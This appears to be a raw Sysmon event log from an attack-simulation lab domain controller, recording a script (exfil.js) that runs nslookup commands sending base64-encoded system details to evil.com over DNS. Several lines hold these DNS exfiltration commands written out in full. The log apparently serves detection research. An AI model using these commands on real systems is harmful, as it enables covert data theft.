14:16:12.013{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.013{2E1864BB-17A1-629A-783D-000000005F02}55526084C:\Windows\System32\WScript.exe{2E1864BB-17AC-629A-603E-000000005F02}7236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.024{2E1864BB-17AC-629A-603E-000000005F02}7236C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlozzb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.013{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhdtemy.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.948{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-8B3E-000000005F02}7324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.948{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-8B3E-000000005F02}7324C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.948{2E1864BB-17AD-629A-8B3E-000000005F02}73241044C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-8A3E-000000005F02}7620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.933{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-8B3E-000000005F02}7324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.917{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.917{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-8A3E-000000005F02}7620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.917{2E1864BB-17A1-629A-783D-000000005F02}55523736C:\Windows\System32\WScript.exe{2E1864BB-17AD-629A-8A3E-000000005F02}7620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.930{2E1864BB-17AD-629A-8A3E-000000005F02}7620C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldgkc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000196008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.917{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.917{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000196006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.896{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllsvo.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.881{2E1864BB-17AD-629A-883E-000000005F02}55846512C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-893E-000000005F02}7264C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.881{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.881{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.881{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.881{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.881{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-893E-000000005F02}7264C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.881{2E1864BB-17AD-629A-873E-000000005F02}32126388C:\Windows\system32\cmd.exe{2E1864BB-17AD-629A-893E-000000005F02}7264C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.884{2E1864BB-17AD-629A-893E-000000005F02}7264C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AD-629A-873E-000000005F02}3212C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllsvo.tmp 2>&1 10341000x8000000000000000195997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.818{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-883E-000000005F02}5584C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.818{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-883E-000000005F02}5584C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.818{2E1864BB-17AD-629A-883E-000000005F02}55846512C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-873E-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.795{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-883E-000000005F02}5584C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000195993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.795{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85F9B931B7CA3D12718AA8C3A8ACEA04,SHA256=24E4A15CF2EF25F45E8F1043549E3D9C81CA92B5858DBDC0D1E2B305DBA54A30,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.795{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 